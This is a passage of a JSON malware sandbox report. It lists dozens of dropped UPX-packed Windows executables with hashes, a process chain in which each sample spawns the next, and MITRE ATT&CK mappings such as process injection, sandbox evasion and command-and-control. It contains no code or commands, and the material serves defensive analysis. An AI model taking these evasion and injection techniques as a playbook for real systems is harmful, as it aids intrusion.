"file_size": 342083, "sha256": "1d156eed646e98f72146389a1d39d2041841efb5ae53bc25ee57e5bb263107b4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jbdtnd.exe (PID: 5756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jfdjvd.exe", "file_path": "C:\\jfdjvd.exe", "file_size": 342135, "sha256": "b5c36c91827fcf84d3123ed6d59af7e56139a4595bac959d9903f320d955f47b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "04284.exe (PID: 4268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jlvlb.exe", "file_path": "C:\\jlvlb.exe", "file_size": 342550, "sha256": "189dbf33c3b119c9e17da009dd58bfab8d8aa68314b69fc63ec380276fb8e769", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0604428.exe (PID: 3568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jnbhhn.exe", "file_path": "C:\\jnbhhn.exe", "file_size": 342597, "sha256": "c78fa6cfb5ceb85f3ca0ba1cd95ec053e46ac8bd10b9296d026ce5a45edf009a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lvdfpxj.exe (PID: 4432)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jnnjf.exe", "file_path": "C:\\jnnjf.exe", "file_size": 342355, "sha256": "f1c60153759a6cd05c748f61371cb0569e4364f7c2f02fb6a34e4b2d4c16c923", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jnnjf.exe (PID: 1896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jnnxfl.exe", "file_path": "C:\\jnnxfl.exe", "file_size": 342921, "sha256": "38bb4ade73838f97c343bffb27b45d1102d849f1c5616a8c894cdfa84bb9eed7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bjdlj.exe (PID: 3832)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lbdtbf.exe", "file_path": "C:\\lbdtbf.exe", "file_size": 342505, "sha256": "ff1e5a08c0e662c86e48bca6bec5fbc77405b97087e864e736279e7d0e933b25", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fxxdb.exe (PID: 2768)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldnfnvr.exe", "file_path": "C:\\ldnfnvr.exe", "file_size": 342321, "sha256": "2b022d67c218a118e64671af03b4fa0060a3398c99d8cb1ed52edcbbb7818c50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rvbjvln.exe (PID: 4368)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "llrlrrb.exe", "file_path": "C:\\llrlrrb.exe", "file_size": 342215, "sha256": "04e7a4def5bc111b8100b789062052497c0e3688013fae95bd1d73ee86621340", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "llrlrrb.exe (PID: 4304)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lpnpn.exe", "file_path": "C:\\lpnpn.exe", "file_size": 342566, "sha256": "ac303d1952d096873f2fce5682680032857a0fac46946a1773af683bb0921d61", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpnpn.exe (PID: 2888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lvdfpxj.exe", "file_path": "C:\\lvdfpxj.exe", "file_size": 342586, "sha256": "f336a1d3d30bdd7d969ba1402cd0936cdb617e996dd7e1385ecc47e50ff1e152", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lvdfpxj.exe (PID: 4432)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njhpfx.exe", "file_path": "C:\\njhpfx.exe", "file_size": 342894, "sha256": "8434dcc270305d776db312d1b43a59618170629943de4fe599616b30d8972758", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4824668.exe (PID: 1112)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nnpbn.exe", "file_path": "C:\\nnpbn.exe", "file_size": 342397, "sha256": "2471e9d023697937e8cc8dfa80703242aaf96e8578ad2879754c3490add6bd33", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nnpbn.exe (PID: 4076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nrhhv.exe", "file_path": "C:\\nrhhv.exe", "file_size": 342149, "sha256": "d54f756dfa44b514a0b8f9114e6e162b629876e750de2c7f4145380f928f7260", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nrhhv.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxfnfn.exe", "file_path": "C:\\nxfnfn.exe", "file_size": 342808, "sha256": "39389c2d69756f0b8f22d9b79d6941a7b1fcf4589641e141523e6e8c10901893", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxfnfn.exe (PID: 644)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxhlxrp.exe", "file_path": "C:\\nxhlxrp.exe", "file_size": 342069, "sha256": "fca7a4f6a058add8e3f261f00b642469541ba956bab3eace446c3a11ec988d7e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "628008.exe (PID: 5764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdhnj.exe", "file_path": "C:\\pdhnj.exe", "file_size": 342771, "sha256": "0ad26da72b0d3ccfe14e8475f4024e78cdca53c89bb250d10d6afed295bfac58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdhnj.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbffv.exe", "file_path": "C:\\rbffv.exe", "file_size": 342097, "sha256": "d2f3a212daa88c010c403069ba2460d97157cd266dc110737ebcc9620b921122", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbffv.exe (PID: 5780)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbppd.exe", "file_path": "C:\\rbppd.exe", "file_size": 342387, "sha256": "81a6cf7b81b25ec41c04a8866ff7c56bbfbea3b7770d3b5371f10e5298cbe6df", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bnxtdj.exe (PID: 4324)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhnxdp.exe", "file_path": "C:\\rhnxdp.exe", "file_size": 342788, "sha256": "2d8e7187839bbf998557f62891f5713aaaf675a493658758f60fcfd2258d75bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdhnj.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhxhth.exe", "file_path": "C:\\rhxhth.exe", "file_size": 342838, "sha256": "b9f10ecf6ff868e1406e16931379707775c4f7427c8b3b8b4efe5d30a51438e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tdtflp.exe (PID: 3856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rvbjvln.exe", "file_path": "C:\\rvbjvln.exe", "file_size": 342307, "sha256": "e9e2345633df97abb043a30127ace8197bdc6909aa3da47710d64ea432756757", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rvbjvln.exe (PID: 4368)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tbbdbn.exe", "file_path": "C:\\tbbdbn.exe", "file_size": 342166, "sha256": "257a098e84c726d2130efc127ae6e399a4caeb6e705a6c5e65d85d2c3882a143", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbbdbn.exe (PID: 6000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tdtflp.exe", "file_path": "C:\\tdtflp.exe", "file_size": 342823, "sha256": "aad89e49dcc57ef5c33a35954e9044ca8b4a4c4b3f1d85d352915d4760a9243e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tdtflp.exe (PID: 3856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tfxnptb.exe", "file_path": "C:\\tfxnptb.exe", "file_size": 342023, "sha256": "3f88f1ae74081920dfe871b7891013430f6eb791c96fd2d62562b68e85fcd03a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe (PID: 5800)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "thdpjd.exe", "file_path": "C:\\thdpjd.exe", "file_size": 342255, "sha256": "205900fc1c796e4b5b5774968c4db80555b439fb3d1c88f0c7863a67fc2f6152", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffpfpp.exe (PID: 6020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjdhtlv.exe", "file_path": "C:\\vjdhtlv.exe", "file_size": 342226, "sha256": "cb1c65b5c5bf2c74a998e38843598bcfc3649887b20d26b424b885d9e3a9e1e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vjdhtlv.exe (PID: 3732)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xpldnr.exe", "file_path": "C:\\xpldnr.exe", "file_size": 342181, "sha256": "8a9b7504d57c979d9bd28b62b0146a4fa60ce29c9bb55a2697d7a322a475983a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tbbdbn.exe (PID: 6000)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xrfjx.exe", "file_path": "C:\\xrfjx.exe", "file_size": 342937, "sha256": "acae49cf4ba08e4de04284b16c3f914764f338c288557c847ac7964c53ec34f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xrfjx.exe (PID: 4468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vhxrtdt.exe", "file_size": 343142, "sha256": "614d7c142b273c9053260ad7a91127bdd1f3eef805661bfc1643d076bc8f10f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bdnnt.exe", "file_size": 343125, "sha256": "3c12009a8487f21e4914b9ed53fb8afc2a4e178c03c35881da3fc3a7a90c315e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pfdblvl.exe", "file_size": 343105, "sha256": "20585bbf501a867b798d88bc7fc0865786cf6d1a5e03efa79cb67bfa76383eea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bphhd.exe", "file_size": 343087, "sha256": "056e5f09652d09c75dca44e4ea64254b23f4fdb0424853fa28f1ccddab45874a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jvrbx.exe", "file_size": 343071, "sha256": "9c4bf2624c3543bbe16b6feb7fe06822f9a09f2561da0a659606914da20310a7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "njvhn.exe", "file_size": 343057, "sha256": "280d68b90863460db49c544eef11db73ce4a0a8231923643934f2a7755d7e3ad", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "468866.exe", "file_size": 343044, "sha256": "627b41b2e9ac7ab401c5bf1d4b3ca3f99b4b6a5fcb940bba43ba1d1ae0a28acf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "664842.exe", "file_size": 343031, "sha256": "f7deb9f66455420e4bf0b88e98b37153af428a9eba5e90eb7a966f006a39f163", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "840664.exe", "file_size": 343013, "sha256": "b34838903cccf9499d73cdd1de2d1132c96f787e5241321a8a40c3539ffb002d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "886680.exe", "file_size": 342999, "sha256": "e0dc1207c567d736ceeedbc9222df2c1f8a4d9c3ffd9f3ee000ae77d84877cea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "404286.exe", "file_size": 342979, "sha256": "7879761943dd58c8fdb0b5aaf86749f7fe309fc2e88979aea1febcd14f45e53a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62664.exe", "file_size": 342966, "sha256": "16b6cd50f91adac2315049c3ea47b7d7921343eba2e5136412f6c18c2ef49216", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005800", "name": "24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe", "normalized_path": "C:\\24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe", "sha256": "24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e"}, {"uid": "00000000-00005984", "parentuid": "00000000-00005800", "name": "tfxnptb.exe", "normalized_path": "c:\\tfxnptb.exe", "sha256": "3f88f1ae74081920dfe871b7891013430f6eb791c96fd2d62562b68e85fcd03a"}, {"uid": "00000000-00006008", "parentuid": "00000000-00005984", "name": "064260.exe", "normalized_path": "c:\\064260.exe", "sha256": "05fa5d8250081a6bb1e2fc963901ee33699856c6c7d4443a26e92d1207e85d1f"}, {"uid": "00000000-00005764", "parentuid": "00000000-00006008", "name": "628008.exe", "normalized_path": "c:\\628008.exe", "sha256": "a8c3a0b41de0e5f5194a4bb7bb2984f9d8c5180b8383184f4173565c8632833b"}, {"uid": "00000000-00005776", "parentuid": "00000000-00005764", "name": "nxhlxrp.exe", "normalized_path": "c:\\nxhlxrp.exe", "sha256": "fca7a4f6a058add8e3f261f00b642469541ba956bab3eace446c3a11ec988d7e"}, {"uid": "00000000-00005756", "parentuid": "00000000-00005776", "name": "jbdtnd.exe", "normalized_path": "c:\\jbdtnd.exe", "sha256": "1d156eed646e98f72146389a1d39d2041841efb5ae53bc25ee57e5bb263107b4"}, {"uid": "00000000-00005780", "parentuid": "00000000-00005756", "name": "rbffv.exe", "normalized_path": "c:\\rbffv.exe", "sha256": "d2f3a212daa88c010c403069ba2460d97157cd266dc110737ebcc9620b921122"}, {"uid": "00000000-00006096", "parentuid": "00000000-00005780", "name": "464446.exe", "normalized_path": "c:\\464446.exe", "sha256": "4b30cb1217016f940b3157588e2e6857c1d756e8eb6ca3da1d7fb6ae4a41c1ce"}, {"uid": "00000000-00004268", "parentuid": "00000000-00006096", "name": "04284.exe", "normalized_path": "c:\\04284.exe", "sha256": "cd930c88e5668c0c72de5dc8833d0e42bd8e1a711ec3dccf636351979a6728ef"}, {"uid": "00000000-00006124", "parentuid": "00000000-00004268", "name": "jfdjvd.exe", "normalized_path": "c:\\jfdjvd.exe", "sha256": "b5c36c91827fcf84d3123ed6d59af7e56139a4595bac959d9903f320d955f47b"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vhxrtdt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bdnnt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pfdblvl.exe\" has flags like 